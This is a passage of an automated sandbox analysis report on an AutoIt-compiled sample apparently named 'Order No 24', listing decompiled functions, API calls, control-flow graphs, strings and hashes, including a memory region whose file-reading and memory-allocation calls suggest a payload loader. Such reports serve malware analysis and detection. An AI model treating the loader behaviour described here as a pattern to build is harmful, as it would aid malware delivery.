                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098380B
                                                                                                                                  • CreatePopupMenu.USER32 ref: 0098381F
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0098382E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                                  • Opcode ID: e61d61dd9c9224bfc050e32522eae84235285d2764e6f81a464391068b372491
                                                                                                                                  • Instruction ID: 4b21c289fb60767d3d8893e6c6a78609f198a5921c8b2e04e643a71ef0b5d33c
                                                                                                                                  • Opcode Fuzzy Hash: e61d61dd9c9224bfc050e32522eae84235285d2764e6f81a464391068b372491
                                                                                                                                  • Instruction Fuzzy Hash: 0F415DFA114249E7DB14FFA8EC4AF793A59F7C1B00F008515F602D2391DB69DD928761
                                                                                                                                  Function 00983E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00983E9E
                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00983EB0
                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00983EC2
                                                                                                                                    • Part of subcall function 00984024: LoadImageW.USER32(00980000,00000063,00000001,00000010,00000010,00000000), ref: 00984048
                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00983F30
                                                                                                                                    • Part of subcall function 00983F53: GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                                                                                                                    • Part of subcall function 00983F53: RegisterClassExW.USER32(00000030), ref: 00983FB0
                                                                                                                                    • Part of subcall function 00983F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00983FC1
                                                                                                                                    • Part of subcall function 00983F53: InitCommonControlsEx.COMCTL32(?), ref: 00983FDE
                                                                                                                                    • Part of subcall function 00983F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                                                                                                                    • Part of subcall function 00983F53: LoadIconW.USER32(000000A9), ref: 00984004
                                                                                                                                    • Part of subcall function 00983F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00984013
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                  • Opcode ID: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                                                                                                                  • Instruction ID: c080fcea4ea142401e108d48a281108b9a4dda69074a979e8366a674d99d49d2
                                                                                                                                  • Opcode Fuzzy Hash: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                                                                                                                  • Instruction Fuzzy Hash: C5212FB9D00314ABDB10DFE9EC45A99BBF5EB89710F00421AE214A72A0D77646868B91
                                                                                                                                  Function 009AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1025 9aacb3-9aace0 call 9a6ac0 call 9a7cf4 call 9a6986 1032 9aacfd-9aad02 1025->1032 1033 9aace2-9aacf8 call 9ae880 1025->1033 1034 9aad08-9aad0f 1032->1034 1039 9aaf52-9aaf57 call 9a6b05 1033->1039 1036 9aad42-9aad51 GetStartupInfoW 1034->1036 1037 9aad11-9aad40 1034->1037 1040 9aae80-9aae86 1036->1040 1041 9aad57-9aad5c 1036->1041 1037->1034 1044 9aae8c-9aae9d 1040->1044 1045 9aaf44-9aaf50 call 9aaf58 1040->1045 1041->1040 1043 9aad62-9aad79 1041->1043 1047 9aad7b-9aad7d 1043->1047 1048 9aad80-9aad83 1043->1048 1049 9aae9f-9aaea2 1044->1049 1050 9aaeb2-9aaeb8 1044->1050 1045->1039 1047->1048 1055 9aad86-9aad8c 1048->1055 1049->1050 1056 9aaea4-9aaead 1049->1056 1052 9aaeba-9aaebd 1050->1052 1053 9aaebf-9aaec6 1050->1053 1057 9aaec9-9aaed5 GetStdHandle 1052->1057 1053->1057 1058 9aadae-9aadb6 1055->1058 1059 9aad8e-9aad9f call 9a6986 1055->1059 1060 9aaf3e-9aaf3f 1056->1060 1061 9aaf1c-9aaf32 1057->1061 1062 9aaed7-9aaed9 1057->1062 1064 9aadb9-9aadbb 1058->1064 1072 9aae33-9aae3a 1059->1072 1073 9aada5-9aadab 1059->1073 1060->1040 1061->1060 1067 9aaf34-9aaf37 1061->1067 1062->1061 1065 9aaedb-9aaee4 GetFileType 1062->1065 1064->1040 1068 9aadc1-9aadc6 1064->1068 1065->1061 1071 9aaee6-9aaef0 1065->1071 1067->1060 1069 9aadc8-9aadcb 1068->1069 1070 9aae20-9aae31 1068->1070 1069->1070 1074 9aadcd-9aadd1 1069->1074 1070->1064 1075 9aaefa-9aaefd 1071->1075 1076 9aaef2-9aaef8 1071->1076 1077 9aae40-9aae4e 1072->1077 1073->1058 1074->1070 1078 9aadd3-9aadd5 1074->1078 1080 9aaf08-9aaf1a InitializeCriticalSectionAndSpinCount 1075->1080 1081 9aaeff-9aaf03 1075->1081 1079 9aaf05 1076->1079 1082 9aae50-9aae72 1077->1082 1083 9aae74-9aae7b 1077->1083 1084 9aadd7-9aade3 GetFileType 1078->1084 1085 9aade5-9aae1a InitializeCriticalSectionAndSpinCount 1078->1085 1079->1080 1080->1060 1081->1079 1082->1077 1083->1055 1084->1085 1086 9aae1d 1084->1086 1085->1086 1086->1070
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 009AACC1
                                                                                                                                    • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                                                                                                                    • Part of subcall function 009A7CF4: EnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                                                                                                                  • __calloc_crt.LIBCMT ref: 009AACD2
                                                                                                                                    • Part of subcall function 009A6986: __calloc_impl.LIBCMT ref: 009A6995
                                                                                                                                    • Part of subcall function 009A6986: Sleep.KERNEL32(00000000,000003BC,0099F507,?,0000000E), ref: 009A69AC
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 009AACED
                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00A36E28,00000064,009A5E91,00A36C70,00000014), ref: 009AAD46
                                                                                                                                  • __calloc_crt.LIBCMT ref: 009AAD91
                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 009AADD8
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 009AAE11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                  • Opcode ID: d3bf4c019a5a473618bb9d5f35618e1b97fc465263ca299e7b6eef1942c944f3
                                                                                                                                  • Instruction ID: 54d852187717effe293a615b23a00fc96e049628d473e699149c8ee008482c28
                                                                                                                                  • Opcode Fuzzy Hash: d3bf4c019a5a473618bb9d5f35618e1b97fc465263ca299e7b6eef1942c944f3
                                                                                                                                  • Instruction Fuzzy Hash: 0A81F3719053458FDB24CFA8C8806ADBBF4AF4B320B24465DE4A6AB3D1D7359803CBD6
                                                                                                                                  Function 01273F50 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1087 1273f50-1273ffe call 1271910 1090 1274005-127402b call 1274e60 CreateFileW 1087->1090 1093 1274032-1274042 1090->1093 1094 127402d 1090->1094 1101 1274044 1093->1101 1102 1274049-1274063 VirtualAlloc 1093->1102 1095 127417d-1274181 1094->1095 1097 12741c3-12741c6 1095->1097 1098 1274183-1274187 1095->1098 1103 12741c9-12741d0 1097->1103 1099 1274193-1274197 1098->1099 1100 1274189-127418c 1098->1100 1104 12741a7-12741ab 1099->1104 1105 1274199-12741a3 1099->1105 1100->1099 1101->1095 1106 1274065 1102->1106 1107 127406a-1274081 ReadFile 1102->1107 1108 1274225-127423a 1103->1108 1109 12741d2-12741dd 1103->1109 1112 12741ad-12741b7 1104->1112 1113 12741bb 1104->1113 1105->1104 1106->1095 1114 1274083 1107->1114 1115 1274088-12740c8 VirtualAlloc 1107->1115 1110 127423c-1274247 VirtualFree 1108->1110 1111 127424a-1274252 1108->1111 1116 12741e1-12741ed 1109->1116 1117 12741df 1109->1117 1110->1111 1112->1113 1113->1097 1114->1095 1118 12740cf-12740ea call 12750b0 1115->1118 1119 12740ca 1115->1119 1120 1274201-127420d 1116->1120 1121 12741ef-12741ff 1116->1121 1117->1108 1127 12740f5-12740ff 1118->1127 1119->1095 1123 127420f-1274218 1120->1123 1124 127421a-1274220 1120->1124 1122 1274223 1121->1122 1122->1103 1123->1122 1124->1122 1128 1274132-1274146 call 1274ec0 1127->1128 1129 1274101-1274130 call 12750b0 1127->1129 1135 127414a-127414e 1128->1135 1136 1274148 1128->1136 1129->1127 1137 1274150-1274154 CloseHandle 1135->1137 1138 127415a-127415e 1135->1138 1136->1095 1137->1138 1139 1274160-127416b VirtualFree 1138->1139 1140 127416e-1274177 1138->1140 1139->1140 1140->1090 1140->1095
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01274021
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01274247
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 204039940-0
                                                                                                                                  • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                  • Instruction ID: 522b950658c84f0687b0640bbd5ec7f154173d506c0450b9a8a5fa009f119b49
                                                                                                                                  • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                  • Instruction Fuzzy Hash: 2BA12974E10249EBDB14EFA4D895BEEBBB5FF48304F208159E611BB280D7759A40CF54
                                                                                                                                  Function 009849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1196 9849fb-984a25 call 98bcce RegOpenKeyExW 1199 9f41cc-9f41e3 RegQueryValueExW 1196->1199 1200 984a2b-984a2f 1196->1200 1201 9f4246-9f424f RegCloseKey 1199->1201 1202 9f41e5-9f4222 call 99f4ea call 9847b7 RegQueryValueExW 1199->1202 1207 9f423d-9f4245 call 9847e2 1202->1207 1208 9f4224-9f423b call 986a63 1202->1208 1207->1201 1208->1207
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009F41DB
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009F421A
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009F4249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                                  • Opcode ID: b8ba8cdc806586f97cf86a5245bd9a3cf666383a1871e7c8b7c103bef1cb38fd
                                                                                                                                  • Instruction ID: 61d06400a1691c3ad018b7c5cb2e0d9a12fded8466abb24be5b610ff62577ffb
                                                                                                                                  • Opcode Fuzzy Hash: b8ba8cdc806586f97cf86a5245bd9a3cf666383a1871e7c8b7c103bef1cb38fd
                                                                                                                                  • Instruction Fuzzy Hash: 14112C71A0010DBEEB04EFE4CD86EFF7BACEF14354F104465B506D6291EA709E429B50
                                                                                                                                  Function 009836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1223 9836b8-983728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                  • Opcode ID: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                                                                                                                  • Instruction ID: 3aa7ca0d88b30a3918d958ea32edb10721836f2183fe868e50f96df9bff7aabb
                                                                                                                                  • Opcode Fuzzy Hash: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                                                                                                                  • Instruction Fuzzy Hash: 3DF0DA795802D47AE771D7D7AC48E672E7DD7C7F60B00001ABA04A21A0C56608D6DAB1
                                                                                                                                  Function 01273CC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1328 1273cc0-1273e41 call 1271910 call 1273bb0 CreateFileW 1335 1273e43 1328->1335 1336 1273e48-1273e58 1328->1336 1337 1273efb-1273f00 1335->1337 1339 1273e5f-1273e79 VirtualAlloc 1336->1339 1340 1273e5a 1336->1340 1341 1273e7d-1273e97 ReadFile 1339->1341 1342 1273e7b 1339->1342 1340->1337 1343 1273e9b-1273ed5 call 1273bf0 call 1272bb0 1341->1343 1344 1273e99 1341->1344 1342->1337 1349 1273ed7-1273eec call 1273c40 1343->1349 1350 1273ef1-1273ef9 ExitProcess 1343->1350 1344->1337 1349->1350 1350->1337
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 01273BB0: Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01273E34
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileSleep
                                                                                                                                  • String ID: OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4
                                                                                                                                  • API String ID: 2694422964-2689342645
                                                                                                                                  • Opcode ID: 8be565973a4962ba056013e4e258d85b9557097f70a89643597d65fd5bdb447e
                                                                                                                                  • Instruction ID: b8e83c1e9790ea0fec2a21c6f879da2ed81960b87f346d19f08a5918d9b74d62
                                                                                                                                  • Opcode Fuzzy Hash: 8be565973a4962ba056013e4e258d85b9557097f70a89643597d65fd5bdb447e
                                                                                                                                  • Instruction Fuzzy Hash: 2D718530D1428DDAEF11DBA4C855BEFBB75AF19304F004598E258BB2C1DBB90B49CB66
                                                                                                                                  Function 009851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0098522F
                                                                                                                                  • _wcscpy.LIBCMT ref: 00985283
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009F3CB0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 1053898822-1585850449
                                                                                                                                  • Opcode ID: 5944d500b0ba4a67f30eef5175a998ba30cd9ad9cdf60e6f6547d96598343c12
                                                                                                                                  • Instruction ID: dcad910a549ab80e96f39e66d8c5ec94251e185a2e19f6e46cdf2bd579610c80
                                                                                                                                  • Opcode Fuzzy Hash: 5944d500b0ba4a67f30eef5175a998ba30cd9ad9cdf60e6f6547d96598343c12
                                                                                                                                  • Instruction Fuzzy Hash: 1B31CF75008740AFC325FBA0DC46FDA77D8AFC5310F00491EF59996291EB74A68DCB92
                                                                                                                                  Function 00984139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                                                                                                                  • _free.LIBCMT ref: 009F36B7
                                                                                                                                  • _free.LIBCMT ref: 009F36FE
                                                                                                                                    • Part of subcall function 0098C833: __wsplitpath.LIBCMT ref: 0098C93E
                                                                                                                                    • Part of subcall function 0098C833: _wcscpy.LIBCMT ref: 0098C953
                                                                                                                                    • Part of subcall function 0098C833: _wcscat.LIBCMT ref: 0098C968
                                                                                                                                    • Part of subcall function 0098C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                  • API String ID: 805182592-1757145024
                                                                                                                                  • Opcode ID: 53ebd96c22a768aaab95373a52955fef70fa621846d65f03896af7af12dc0a66
                                                                                                                                  • Instruction ID: 55c1c02228c98b62f0b2484c6ac5e4d8a66a42930956cd957ef4a26f74abb6bb
                                                                                                                                  • Opcode Fuzzy Hash: 53ebd96c22a768aaab95373a52955fef70fa621846d65f03896af7af12dc0a66
                                                                                                                                  • Instruction Fuzzy Hash: 98913F71910219AFCF04EFA4CC92AFDB7B4BF59310F108429F916EB291DB349A55CB90
                                                                                                                                  Function 00984A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00985374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A41148,?,009861FF,?,00000000,00000001,00000000), ref: 00985392
                                                                                                                                    • Part of subcall function 009849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                                                                                                                  • _wcscat.LIBCMT ref: 009F2D80
                                                                                                                                  • _wcscat.LIBCMT ref: 009F2DB5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                  • String ID: \$\Include\
                                                                                                                                  • API String ID: 3592542968-2640467822
                                                                                                                                  • Opcode ID: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                                                                                                                  • Instruction ID: f281bdf6a44eaeafbc264ff997f52f722b64f862c92f2cc6b40ecb7219a7f2b7
                                                                                                                                  • Opcode Fuzzy Hash: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                                                                                                                  • Instruction Fuzzy Hash: ED51657D4043409FC714EFA9D981BAAB7F8FFDA300B804A2EF64597261EB319549CB51
                                                                                                                                  Function 009A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __getstream.LIBCMT ref: 009A34FE
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 009A3539
                                                                                                                                  • __wopenfile.LIBCMT ref: 009A3549
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
